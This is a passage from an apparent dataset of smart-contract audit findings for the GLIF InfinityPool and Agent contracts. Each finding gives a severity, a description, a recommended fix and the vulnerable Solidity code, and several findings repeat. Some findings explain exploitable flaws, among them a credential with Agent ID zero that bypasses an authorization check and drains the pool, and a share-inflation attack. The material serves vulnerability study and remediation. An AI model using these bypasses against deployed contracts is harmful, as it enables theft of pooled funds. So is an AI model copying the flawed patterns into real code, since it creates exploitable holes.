agentPolice.beneficiaryWithdrawable(receiver, msg.sender, id, sendAmount);\\n}\\nelse if (msg.sender != owner()) {\\n revert Unauthorized();\\n}\\n\\n// unwrap any wfil needed to withdraw\\n\\_poolFundsInFIL(sendAmount);\\n// transfer funds\\npayable(receiver).sendValue(sendAmount);\\n```\\n\\nThe issue is that anyone can call this function directly, and the quota will be reduced without funds being transferred.",Ensure only the Agent can call this function.,,"```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n" +An Agent can borrow even with existing debt in interest payments,medium,"To `borrow` funds, an `Agent` has to call the `borrow` function of the pool:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, 
id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n\\nLet's assume that the `Agent` already had some funds borrowed. During this function execution, the current debt status is not checked. The principal debt increases after borrowing, but `account.epochsPaid` remains the same. So the pending debt will instantly increase as if the borrowing happened on `account.epochsPaid`.",Ensure the debt is paid when borrowing more funds.,,"```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n" +The AgentPolice.distributeLiquidatedFunds() function can have undistributed residual funds,medium,"When an Agent is liquidated, the liquidator (owner of the protocol) is supposed to try to redeem as many funds as possible and re-distribute them to the pools:\\n```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) 
external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n\\nThe problem is that in the pool, it's accounted that the amount of funds can be larger than the debt. In that case, the pool won't transfer more funds than the pool needs:\\n```\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n\\nemit WriteOff(agentID, recoveredFunds, lostAmt, interestPaid);\\n```\\n\\nIf that happens, the remaining funds will be stuck in the `AgentPolice` contract.",Return the residual funds to the Agent's owner or process them in some way so they are not lost.,,"```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n" +An Agent can be upgraded even if there is no new implementation,medium,"Agents can be upgraded to a new implementation, and only the Agent's owner can call the upgrade function:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n 
router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nThe issue is that the owner can trigger the upgrade even if no new implementation exists. Multiple possible problems derive from it.\\nUpgrading to the current implementation of the Agent will break the logic because the current version is not calling the `migrateMiner` function, so all the miners will stay with the old Agent, and their funds will be lost.\\nThe owner can accidentally trigger multiple upgrades simultaneously, leading to a loss of funds (https://github.com/ConsenSysDiligence/glif-audit-2023-04/issues/2).\\nThe owner also has no control over the new version of the Agent. To increase decentralization, it's better to pass the deployer's address as a parameter additionally.","Ensure the upgrades can only happen when there is a new version of an Agent, and the owner controls this version.",,"```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from 
the registry\\n agents[agent] = 0;\\n}\\n```\\n" +Potential re-entrancy issues when upgrading the contracts,low,"The protocol doesn't have any built-in re-entrancy protection mechanisms. That mainly explains by using the `wFIL` token, which is not supposed to give that opportunity. And also by carefully using `FIL` transfers.\\nHowever, there are some places in the code where things may go wrong in the future. For example, when upgrading an Agent:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nHere, we see the `oldAgent.decommissionAgent(newAgent);` call happens before the `oldAgent` is deleted. 
Inside this function, we see:\\n```\\nfunction decommissionAgent(address \\_newAgent) external {\\n // only the agent factory can decommission an agent\\n AuthController.onlyAgentFactory(router, msg.sender);\\n // if the newAgent has a mismatching ID, revert\\n if(IAgent(\\_newAgent).id() != id) revert Unauthorized();\\n // set the newAgent in storage, which marks the upgrade process as starting\\n newAgent = \\_newAgent;\\n uint256 \\_liquidAssets = liquidAssets();\\n // Withdraw all liquid funds from the Agent to the newAgent\\n \\_poolFundsInFIL(\\_liquidAssets);\\n // transfer funds to new agent\\n payable(\\_newAgent).sendValue(\\_liquidAssets);\\n}\\n```\\n\\nHere, the FIL is transferred to a new contract which is currently unimplemented and unknown. Potentially, the fallback function of this contract could trigger a re-entrancy attack. If that's the case, during the execution of this function, there will be two contracts that are active agents with the same ID, and the attacker can try to use that maliciously.","Be very cautious with further implementations of agents and pools. 
Also, consider using reentrancy protection in public functions.",,"```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n" +InfinityPool is subject to a donation with inflation attack if emptied.,low,"Since `InfinityPool` is an implementation of the ERC4626 vault, it is too susceptible to inflation attacks. An attacker could front-run the first deposit and inflate the share price to an extent where the following deposit will be less than the value of 1 wei of share resulting in 0 shares minted. The attacker could conduct the inflation by means of self-destructing of another contract. In the case of GLIF this attack is less likely on the first pool since GLIF team accepts predeposits so some amount of shares was already minted.
We do suggest fixing this issue before the next pool is deployed and no pre-stake is generated.\\n```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\n","Since the pool does not need to accept donations, the easiest way to handle this case is to use virtual price, where the balance of the contract is duplicated in a separate variable.",,```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? 
assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\n +MaxWithdraw should potentially account for the funds available in the ramp.,low,"Since `InfinityPool` is ERC4626 it should also support the `MaxWithdraw` method. According to the EIP it should include any withdrawal limitation that the participant could encounter. At the moment the `MaxWithdraw` function returns the maximum amount of IOU tokens rather than WFIL. Since IOU token is not the `asset` token of the vault, this behavior is not ideal.\\n```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\n",We suggest considering returning the maximum amount of WFIL withdrawal which should account for Ramp balance.,,```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\n +"The upgradeability of MinerRegistry, AgentPolice, and Agent is overcomplicated and has a high chance of errors. Acknowledged",low,"During the engagement, we have identified a few places that signify that the `Agent`, `MinerRegistry` and `AgentPolice` can be upgraded, for example:\\nAbility to migrate the miner from one version of the Agent to another inside the `migrateMiner`.\\nAbility to `refreshRoutes` that would update the `AgentPolice` and `MinerRegistry` addresses for a given Agent.\\nAbility to `decommission` pool. We believe that while this functionality is present, it is not very well thought through.
For example, both `MinerRegistry` and `AgentPolice` are not upgradable but have mappings inside of them.\\n```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n\\n```\\nmapping(bytes32 => bool) private \\_minerRegistered;\\n\\nmapping(uint256 => uint64[]) private \\_minersByAgent;\\n```\\n\\nThat means that any time these contracts would need to be upgraded, the contents of those mappings will need to be somehow recreated in the new contract. That is not trivial since it is not easy to obtain all values of a mapping. This will also require an additional protocol-controlled setter ala kickstart mapping functions that are not ideal.\\nIn the case of `Agent` if the contract was upgradable there would be no need for a process of migrating miners that can be tedious and opens possibilities for errors. Since protocol has a lot of centralization and trust assumptions already, having upgradability will not contribute to it a lot.\\nWe also believe that during the upgrade of the pool, the PoolToken will stay the same in the new pool. That means that the minting and burning permissions of the share tokens have to be carefully updated or checked in a manner that does not require the address of the pool to be constant. 
Since we did not have access to this file, we can not check if that is done correctly.",Consider using upgradable contracts or have a solid upgrade plan that is well-tested before an emergency situation occurs.,,```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n +Mint function in the Infinity pool will emit the incorrect value.,low,"In the `InifinityPool` file the `mint` function recomputes the amount of the assets before emitting the event. While this is fine in a lot of cases, that will not always be true. The result of `previewMint` and `convertToAssets` will only be equal while the `totalAssets` and `totalSupply` are equal. 
For example, this assumption will break after the first liquidation.\\n```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\n",Use the `assets` value computed by the `previewMint` when emitting the event.,,"```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\n" +Potential overpayment due to rounding imprecision Won't Fix,low,"Inside the `InifintyPool` the `pay` function might accept unaccounted files. Imagine a situation where an Agent is trying to repay only the fees portion of the debt. 
In that case, the following branch will be executed:\\n```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n\\nThe issue is if the `value` does not divide by the `interestPerEpoch` exactly, any remainder will remain in the InfinityPool.\\n```\\nuint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n```\\n","Since the remainder will most likely not be too large this is not critical, but ideally, those remaining funds would be included in the `refund` variable.",,"```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n" +jumpStartAccount should be subject to the same approval checks as regular borrow.,low,"`InfinityPool` contract has the ability to kick start an account that will have a debt position in this pool.\\n```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = 
block.number;\\n account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\n","We suggest that this action is subject to the same rules as the standard borrow action. Thus checks on DTE, LTV and DTI should be done if possible.",,"```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = block.number;\\n account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\n" +InfinityPool Contract Authorization Bypass Attack,high,"An attacker could create their own credential and set the `Agent` ID to `0`, which would bypass the `subjectIsAgentCaller` modifier. The attacker could use this attack to `borrow` funds from the pool, draining any available liquidity. 
For example, only an `Agent` should be able to `borrow` funds from the pool and call the `borrow` function:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n\\nThe following modifier checks that the caller is an Agent:\\n```\\nmodifier subjectIsAgentCaller(VerifiableCredential memory vc) {\\n if (\\n GetRoute.agentFactory(router).agents(msg.sender) != vc.subject\\n ) revert Unauthorized();\\n \\_;\\n}\\n```\\n\\nBut if the caller is not an `Agent`, the `GetRoute.agentFactory(router).agents(msg.sender)` will return `0`. And if the `vc.subject` is also zero, the check will be successful with any `msg.sender`. 
The attacker can also pass an arbitrary `vc.value` as the parameter and steal all the funds from the pool.",Ensure only an `Agent` can call `borrow` and pass the `subjectIsAgentCaller` modifier.,,"```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n" +Wrong Accounting for totalBorrowed in the InfinityPool.writeOff Function,high,"Here is a part of the `InfinityPool.writeOff` function:\\n```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n\\nThe `totalBorrowed` is decreased by the `lostAmt` value. 
Instead, it should be decreased by the original `account.principal` value to acknowledge the loss.",Resolution\\nFixed.,,"```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n" +The beneficiaryWithdrawable Function Can Be Called by Anyone,high,"The `beneficiaryWithdrawable` function is supposed to be called by the Agent when a beneficiary is trying to withdraw funds:\\n```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n\\nThis function reduces the quota that is supposed to be transferred during the `withdraw` call:\\n```\\n sendAmount = agentPolice.beneficiaryWithdrawable(receiver, msg.sender, id, sendAmount);\\n}\\nelse if (msg.sender != owner()) {\\n revert Unauthorized();\\n}\\n\\n// unwrap any wfil needed to withdraw\\n\\_poolFundsInFIL(sendAmount);\\n// transfer funds\\npayable(receiver).sendValue(sendAmount);\\n```\\n\\nThe issue 
is that anyone can call this function directly, and the quota will be reduced without funds being transferred.",Ensure only the Agent can call this function.,,"```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n" +An Agent Can Borrow Even With Existing Debt in Interest Payments,medium,"To `borrow` funds, an `Agent` has to call the `borrow` function of the pool:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, 
vc.value);\\n}\\n```\\n\\nLet's assume that the `Agent` already had some funds borrowed. During this function execution, the current debt status is not checked. The principal debt increases after borrowing, but `account.epochsPaid` remains the same. So the pending debt will instantly increase as if the borrowing happened on `account.epochsPaid`.",Ensure the debt is paid when borrowing more funds.,,"```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n" +The AgentPolice.distributeLiquidatedFunds() Function Can Have Undistributed Residual Funds,medium,"When an Agent is liquidated, the liquidator (owner of the protocol) is supposed to try to redeem as many funds as possible and re-distribute them to the pools:\\n```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n\\nThe problem is that in the pool, it's accounted that the 
amount of funds can be larger than the debt. In that case, the pool won't transfer more funds than the pool needs:\\n```\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n\\nemit WriteOff(agentID, recoveredFunds, lostAmt, interestPaid);\\n```\\n\\nIf that happens, the remaining funds will be stuck in the `AgentPolice` contract.",Return the residual funds to the Agent's owner or process them in some way so they are not lost.,,"```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n" +An Agent Can Be Upgraded Even if There Is No New Implementation,medium,"Agents can be upgraded to a new implementation, and only the Agent's owner can call the upgrade function:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n 
